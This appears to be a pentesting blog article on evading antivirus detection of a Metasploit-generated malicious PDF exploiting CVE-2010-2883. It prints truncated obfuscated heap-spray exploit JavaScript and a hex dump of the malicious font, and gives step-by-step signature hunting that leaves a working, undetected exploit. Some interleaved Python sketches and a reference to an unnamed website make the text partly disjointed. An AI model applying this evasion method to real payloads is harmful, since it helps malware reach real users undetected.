Every pentester has at some point grappled with an antivirus blocking their tools, be it during a pentest, a phishing campaign, a security awareness demonstration, and so on. Many Internet resources present the usual techniques for bypassing AV signatures when working with executables, or at least when the detection targets the payload in use, such as a meterpreter. In that case, one can resort to encoders, packers, or more manual solutions like modifying and recompiling the exploit code.
But what can be done when the detection targets an exploit tied to a file format like PDF while the active payload itself is not detected, rendering encoders useless?
This article gives a few approaches for these kinds of situations, and shows the importance of defense in depth when malicious code is able to bypass all the gates and reach the heart of the company.
The exploit used here is generated by the metasploit module "adobe_cooltype_sing", which exploits CVE-2010-2883 in an old version of a PDF reader and is, of course, detected by most antiviruses. The Virustotal rating of the PDF before any tampering is 36/53. Note: in the remainder of the article, only one antivirus is used to assess detection. Also, for readability, the payloads are heavily shortened (at the location of the "[...]" strings).
We expected that, at one point or another, it would be necessary to perform a dichotomic search by overwriting pieces of the file, smaller and smaller, until the signature is precisely located. However, this technique, which is also well known for executable files, risks failing because of possible PDF compression if applied too naively.
Indeed, PDF streams can be compressed (or even encrypted in the case of password-protected PDFs), which is apparently the case for the PDF produced by metasploit. A quick "strings" piped into "grep" on the original file returns nothing readable.
A good idea is then to uncompress the PDF's streams with pdftk and continue to work from there. The JS code becomes visible inside the new PDF:
$ strings msf_reverse_tcp.pdf | grep var
$ pdftk msf_reverse_tcp.pdf output msf_reverse_tcp_unc.pdf uncompress
$ strings msf_reverse_tcp_unc.pdf | grep var
var bLqIoDLVxNIMTRCnavxkuacbyJzEwYzvGuLcxmHRnhcxgXsWbkstUxXNeGfStdiNZWvfkikJwYFqANpGyrIKMPvAkIbElHOKLtw = unescape;
var gKUPOmXAgssMAYAuMnIrRhSqUhhZhFECrgXJtAYZNCUrZXAdfT = bLqIoDLVxNIMTRCnavxkuacbyJzEwYzvGuLcxmHRnhcxgXsWbkstUxXNeGfStdiNZWvfkikJwYFqANpGyrIKMPvAkIbElHOKLtw( '%u4141%u4141%u63a5%u4a80%u0000%u4a8a%u2196%u4a80%u1f90%u4a80%u903c%u4a84%ub692%u4a80%u1064%u4a80%u22c8%u4a85%u0000%u1000%u0000%u0000%u0000%u0000%u0002%u0000[...]
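To illustrate why "strings" finds nothing before decompression, here is a minimal Python sketch that looks for stream bodies in a PDF and tries to inflate them with zlib. It is only an inspection aid under simplifying assumptions (streams delimited by the "stream" and "endstream" keywords, Flate compression only, no encryption); it does not rewrite the file the way pdftk does, and the name inflate_streams is hypothetical.

```python
import re
import zlib

# Simplifying assumption: each stream body sits between "stream<EOL>" and "endstream".
STREAM_RE = re.compile(rb"stream\r?\n(.*?)endstream", re.DOTALL)


def inflate_streams(pdf_bytes):
    """Return every stream body, inflated when it is valid zlib data."""
    bodies = []
    for match in STREAM_RE.finditer(pdf_bytes):
        raw = match.group(1)
        inflater = zlib.decompressobj()
        try:
            data = inflater.decompress(raw)
        except zlib.error:
            data = None  # not zlib data at all
        if data is not None and inflater.eof:
            bodies.append(data)  # complete Flate stream, trailing EOL ignored
        else:
            bodies.append(raw.rstrip(b"\r\n"))  # keep the raw body as-is
    return bodies
```

Searching the returned bodies for a keyword such as "var" then plays the same role as the "strings | grep" check on the uncompressed file.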
Then, the file can be analyzed further. A PDF is structured as a set of "objects", "streams", etc. The exploit can be expected to lie inside one of these, and it is worth knowing exactly which one before proceeding with signature hunting. Several tools allow examining this structure and extracting or editing its contents. The Origami library is pretty well known, but another tool with a gentler learning curve, peepdf (available on GitHub), is a lifesaver for this task.
Once the file is open in peepdf, its structure can be inspected. Then, using commands such as "stream" and "object", the contents of the different elements of the PDF are printed to the console.
This confirms that the relevant data is probably in streams 12 and 13. Indeed, stream 12 contains a load of binary data, which turns out to be a TTF font once its visible headers are looked up online. This also matches what can be seen in the source code of the metasploit module and the information available about CVE-2010-2883.
PPDF> stream 12
00 01 00 00 00 11 01 00 00 04 00 10 4f 53 2f 32 |............OS/2|
b4 5f f4 63 00 00 eb 70 00 00 00 56 50 43 4c 54 |._.c...p...VPCLT|
d1 8a 5e 97 00 00 eb c8 00 00 00 36 63 6d 61 70 |..^........6cmap|
[...]
09 c6 8e b2 00 00 b4 c4 00 00 04 30 6b 65 a2 6e |...........0ke.n|
dc 52 d5 99 00 00 bd a0 00 00 2d 8a 6c 6f 63 61 |.R........-.loca|
f3 cb d2 3d 00 00 bb 84 00 00 02 1a 6d 61 78 70 |...=........maxp|
05 47 06 3a 00 00 eb 2c 00 00 00 20 53 49 4e 47 |.G.:...,... SING|
d9 bc c8 b5 00 00 01 1c 00 00 1d df 70 6f 73 74 |............post|
b4 5a 2f bb 00 00 b8 f4 00 00 02 8e 70 72 65 70 |.Z/.........prep|
3b 07 f1 00 00 00 20 f8 00 00 05 68 00 00 01 00 |;..... ....h....|
PPDF> stream 13
var bLqIoDLVxNIMTRCnavxkuacbyJzEwYzvGuLcxmHRnhcxgXsWbkstUxXNeGfStdiNZWvfkikJwYFqANpGyrIKMPvAkIbElHOKLtw = unescape;
var gKUPOmXAgssMAYAuMnIrRhSqUhhZhFECrgXJtAYZNCUrZXAdfT = bLqIoDLVxNIMTRCnavxkuacbyJzEwYzvGuLcxmHRnhcxgXsWbkstUxXNeGfStdiNZWvfkikJwYFqANpGyrIKMPvAkIbElHOKLtw( '%u4141%u4141%u63a5%u4a80%u0000%u4a8a%u2196%u4a80%u[...]09eb%u7c1d%uae0c%u7e22%u7831%uf41b%ub872%u0718%u9dc9%u8209%ub131%u874a' );
var NHsheKHxxsiFwYSLeTJsvaVNoHcSmmkpbshf = bLqIoDLVxNIMTRCnavxkuacbyJzEwYzvGuLcxmHRnhcxgXsWbkstUxXNeGfStdiNZWvfkikJwYFqANpGyrIKMPvAkIbElHOKLtw( "%" + "u" + "0" + "c" + "0" + "c" + "%u" + "0" + "c" + "0" + "c" );
while (NHsheKHxxsiFwYSLeTJsvaVNoHcSmmkpbshf.length + 20 + 8 < 65536) NHsheKH[...]
uyPOxlONxNAsEbZgKQSSHNBIjxCPEsRzmRikHPWBjFizyLiwUTcKsqDyoFqkyOgewwwOexstH = SoVA.substring(0, 0x80000 - (0x1020-0x08) / 2);
var ytAVecOTixEhAmGUPrbvpDMQprLEUNHjpiGJoiSPLMkmwWIslXgaiQzDBXEmpFoNpO = new Array();
for (AaPspolcXVmrkWjwpNCvdujVsMECTtClFAYvL=0;AaPspolcXVmrkWjwpNCvdujVsMECTtClFAYvL<0x1f0;AaPspolcXVmrkWjwpNCvdujVsMECTtClFAYvL++) ytAVecOTixEhAmGUPrbvpDMQprLEUNHjpiGJoiSPLMkmwWIslXgaiQzDBXEmpFoNpO[AaPspolcXVmrkWjwpNCvdujVsMECTtClFAYvL]=uyPOxlONxNAsEbZgKQSSHNBIjxCPEsRzmRikHPWBjFizyLiwUTcKsqDyoFqkyOgewwwOexstH+"s";
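The binary data of stream 12 can be recognised as a font without searching the net, because it starts with a standard sfnt table directory: a 12-byte header followed by 16-byte records (tag, checksum, offset, length). The following Python sketch decodes that directory. The function name parse_table_directory is hypothetical, and the sample bytes are limited to two of the records visible in the hex dump of stream 12.

```python
import struct


def parse_table_directory(font):
    """Return (version, {tag: (offset, length)}) from an sfnt font header."""
    version, num_tables = struct.unpack(">IH", font[:6])
    tables = {}
    for i in range(num_tables):
        record = font[12 + 16 * i : 28 + 16 * i]
        if len(record) < 16:
            break  # truncated input: stop instead of failing
        tag, _checksum, offset, length = struct.unpack(">4sIII", record)
        tables[tag.decode("latin-1")] = (offset, length)
    return version, tables


# Header with numTables set to 2 for brevity (the real font declares 0x11 tables),
# followed by the "OS/2" and "SING" records copied from the dump.
sample = bytes.fromhex(
    "000100000002010000040010"
    "4f532f32b45ff4630000eb7000000056"
    "53494e47d9bcc8b50000011c00001ddf"
)
version, tables = parse_table_directory(sample)
print(hex(tables["SING"][0]))  # 0x11c
```

The "SING" record points to offset 0x11c inside the font, which is the table involved in CVE-2010-2883.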
Next, the idea is to isolate the contents of the streams one by one, by overwriting every one of them but one with a dummy string, before giving the results to the antivirus and checking how the detection changes.
The "modify" command of peepdf allows this substitution:
PPDF> modify
Usage: modify object|stream $object_id [$version] [$file]
Modifies the object or stream specified. It's possible to use a file to retrieve the stream content (ONLY for stream content).
For instance, substituting stream 12 with a "toto" string and saving the result to a file:
PPDF> modify stream 12
Please, specify the stream content (if the content includes EOL characters use a file instead):
toto
Object modified successfully!!
PPDF> save stream12.pdf
File saved succesfully!!
Of course, the same process is repeated with all other suspect streams or objects. In this example, a set of 4 files is generated, with streams 9, 12, 13 and 14 respectively isolated. The resulting files are scanned by the antivirus, and things clearly become a little harder: the tests show that there are at least two different signatures, one for stream 12 and one for stream 13. However, no signature matches any other object or stream.
The JS code from the PDF is copy-pasted into the website, which returns the following code, very different from the original:
It remains to put this code back inside the PDF with "modify stream 13 modified.js". N.B. if the new data contains carriage returns, it is necessary to go through an intermediary file, here modified.js. Afterwards, the antivirus is run on the new file. It is detected as EXP/CVE-2010-2883, which is the signature for the other stream, the one containing the TTF font. To be sure, if the TTF stream is now replaced by a dummy string like "toto", no signature is triggered.
For the CVE detection bypass, it seemed convenient to fall back on good old dichotomic signature hunting.
A small script, chunker.rb, was written for this purpose. It is probably not bug-free and is quite naive, but it covers the needs. It is used like this: ruby chunker.rb <file> <number of chunks> [start offset] [end offset]. If no offsets are specified, the whole file is processed by default. The script divides the zone to process according to the number of chunks requested, and overwrites the chunks one by one with "AAAAA" strings, writing each result to a new file whose name indicates the overwritten offsets.
To determine the relevant offsets for the first pass, peepdf has a practical "offsets" command, which lists the starting and ending offsets of the various PDF objects:
PPDF> offsets
[...]
556 Object 9 (114) 669
672 Object 11 (126) 797
800 Object 12 (66000) 66799
66802 Object 4 (60) 66861
66864 Object 13 (53) 66916
[...]
67688 Trailer (51) 67738
67739 EOF
Remember, the stream holding the "malicious" TTF font is number 12, hence between bytes 800 and 66799. As the processed PDF is uncompressed, it is possible to run the chunker.rb script directly on the file, between these offsets:
$ ruby chunker.rb msf_rev_tcp_jsOk.pdf 100 800 66799
As output, 100 new PDF files are generated, whose names indicate the offsets between which the data was overwritten:
$ ls output/
chunk-10026-10685.pdf chunk-17275-17934.pdf chunk-24524-25183.pdf chunk-31773-32432.pdf chunk-39022-39681.pdf chunk-46271-46930.pdf chunk-53520-54179.pdf chunk-6072-6731.pdf chunk-7390-8049.pdf
chunk-10685-11344.pdf chunk-17934-18593.pdf chunk-25183-25842.pdf chunk-32432-33091.pdf chunk-39681-40340.pdf chunk-46930-47589.pdf chunk-5413-6072.pdf chunk-60769-61428.pdf chunk-800-1459.pdf
chunk-11344-12003.pdf chunk-18593-19252.pdf chunk-25842-26501.pdf chunk-33091-33750.pdf chunk-40340-40999.pdf chunk-4754-5413.pdf chunk-54179-54838.pdf chunk-61428-62087.pdf chunk-8049-8708.pdf
chunk-12003-12662.pdf chunk-19252-19911.pdf chunk-26501-27160.pdf chunk-33750-34409.pdf chunk-4095-4754.pdf chunk-47589-48248.pdf chunk-54838-55497.pdf chunk-62087-62746.pdf chunk-8708-9367.pdf
chunk-12662-13321.pdf chunk-19911-20570.pdf chunk-27160-27819.pdf chunk-3436-4095.pdf chunk-40999-41658.pdf [...]
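The file names above are consistent with a fixed chunk size obtained by integer division of the zone length by the number of chunks: (66799 - 800) / 100 gives 659 bytes. The following Python sketch reproduces that splitting and the overwrite of one chunk in memory. It is not the author's chunker.rb; the function names are hypothetical, and ignoring the leftover bytes at the end of the zone is an assumption.

```python
def chunk_ranges(start, end, count):
    """Split [start, end) into `count` equal ranges; leftover bytes are ignored."""
    size = (end - start) // count
    if size < 1:
        raise ValueError("zone too small for that many chunks")
    return [(start + i * size, start + (i + 1) * size) for i in range(count)]


def overwrite(data, lo, hi, filler=b"A"):
    """Return a copy of `data` with bytes lo..hi-1 replaced, length unchanged."""
    return data[:lo] + filler * (hi - lo) + data[hi:]


ranges = chunk_ranges(800, 66799, 100)
print(ranges[0])  # (800, 1459), matching chunk-800-1459.pdf
```

Keeping the file length unchanged matters here, since the offsets reported by peepdf must stay valid from one pass to the next.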
Next, the antivirus is run over this file corpus in cleaning mode, so that only the undetected files remain in the folder. That way, all the zones whose overwriting bypasses the AV detection can be seen at a glance.
After this first script run, only one undetected file remains:
Conclusion: the signature lies between offsets 800 and 1459. It is then possible to run the script a second time between these new offsets, in order to identify the detected zone more precisely:
$ ruby chunker.rb msf_rev_tcp_jsOk.pdf 100 800 1459
This time, the number of positive detections drops, and the remaining files narrow the detected zone down to offsets 1016 to 1148.
Apparently, there is no discontinuity in the detection, hence, with a little luck, only one signature for the whole zone. Therefore, modifying only a few bytes between the 1016th and 1148th byte could be enough to bypass the antivirus. The problem is that this is now a binary file that needs patching, and the modifications must not "break" the exploit in any way.
The relevant zone is examined in a hexadecimal editor:
It looks like this is in the middle of the TTF file headers. Besides, the header announcing the "SING" table that allows exploitation of CVE-2010-2883 can be seen in the middle of the window. After a few checks, this zone turns out to be good news. Reading the metasploit module shows that the data important for exploitation is written at offset 284 (0x11c) of the TTF file (cf. line 124 of the module source).
Yet here, the detection happens between bytes 1016 - 800 = 216 and 1148 - 800 = 348 of the TTF file.
Why this 800-byte correction?
Peepdf has shown that the TTF file begins at offset 800 in the PDF file, while the offsets taken from the metasploit module are relative to the TTF file itself.
In short, it might be possible to manipulate bytes of the TTF file between offsets 216 and 284, a range that lies before the significant exploit bytes yet inside the antivirus detection zone, thus without "damaging" the exploit or having to dive into the assembly in order to modify it.
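The offset arithmetic above can be written out as a small Python sketch. It relies on the same approximation as the article, namely that the font data starts exactly at the object offset reported by peepdf; the constant and function names are hypothetical.

```python
STREAM_START = 800        # start of the TTF stream in the PDF, per peepdf
SING_DATA_OFFSET = 0x11c  # 284: font offset used by the metasploit module


def to_font_offset(pdf_offset, stream_start=STREAM_START):
    """Convert an offset in the PDF file into an offset in the embedded font."""
    return pdf_offset - stream_start


# Detection zone found by the second pass, expressed relative to the font.
detected = (to_font_offset(1016), to_font_offset(1148))

# Bytes that are flagged but located before the data the exploit depends on.
candidate = (detected[0], min(detected[1], SING_DATA_OFFSET))

print(detected)   # (216, 348)
print(candidate)  # (216, 284)
```

The candidate window is therefore 68 bytes wide, all of it located before the offset written by the module.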
By running the chunker.rb script again from the beginning of the flagged zone inside stream 12, that is from offset 1016, it turned out by luck that one of the produced files was a perfectly functional exploit while being undetected.
Actually, the very first produced file, starting at offset 1016, works like a charm! Curiosity urges us to check what exactly the script overwrote:
4 non-ASCII bytes inside the TTF header were replaced by "A"s. We won't go any further in parsing the TTF header to find out precisely what these bytes are, given that the goal is reached and that it is now possible to enjoy successful exploitation and code execution despite the workstation's antivirus.
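It was possible to combine already known signature isolation techniques with tools able to properly parse the targeted file format in order to achieve antivirus bypass. The general approach was: uncompress the file's streams, parse the structure to locate the streams carrying the exploit, isolate each stream to find which ones trigger a detection, transform the text-based content (here, the JavaScript), and narrow down the remaining binary signature by dichotomic overwriting until a few harmless bytes can be modified.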
This methodology can be extended to other file formats, given access to tools able to extract structures and data that make up those formats.
While antiviruses remain useful for blocking most malicious code, they are generally effective only against already known samples. Moreover, we have just seen that it is relatively easy to make a previously flagged file undetectable without altering its operation. Therefore, the defense in depth principle is necessary in order to limit the potential damage caused by malicious code making its way into the heart of internal networks. Furthermore, detection capabilities must not be limited to virus detection, but should take into account suspicious behaviour in every part of the Information System.